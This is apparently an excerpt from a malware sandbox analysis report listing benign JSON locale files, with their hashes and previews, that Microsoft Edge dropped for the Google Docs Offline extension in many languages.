                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):977
                                                                                                                                                                                                      Entropy (8bit):4.622066056638277
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                      MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                      SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                      SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                      SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):972
                                                                                                                                                                                                      Entropy (8bit):4.621319511196614
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                      MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                      SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                      SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                      SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):990
                                                                                                                                                                                                      Entropy (8bit):4.497202347098541
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                      MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                      SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                      SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                      SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1658
                                                                                                                                                                                                      Entropy (8bit):4.294833932445159
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                      MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                      SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                      SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                      SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1672
                                                                                                                                                                                                      Entropy (8bit):4.314484457325167
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                      MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                      SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                      SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                      SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):935
                                                                                                                                                                                                      Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                      MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                      SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                      SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                      SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1065
                                                                                                                                                                                                      Entropy (8bit):4.816501737523951
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                      MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                      SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                      SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                      SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2771
                                                                                                                                                                                                      Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                      MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                      SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                      SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                      SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                      Entropy (8bit):4.474411340525479
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                      MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                      SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                      SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                      SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):954
                                                                                                                                                                                                      Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                      MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                      SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                      SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                      SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):899
                                                                                                                                                                                                      Entropy (8bit):4.474743599345443
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                      MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                      SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                      SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                      SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2230
                                                                                                                                                                                                      Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                      MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                      SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                      SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                      SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1160
                                                                                                                                                                                                      Entropy (8bit):5.292894989863142
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                      MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                      SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                      SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                      SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3264
                                                                                                                                                                                                      Entropy (8bit):3.586016059431306
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                      MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                      SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                      SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                      SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3235
                                                                                                                                                                                                      Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                      MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                      SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                      SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                      SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                      Malicious:false
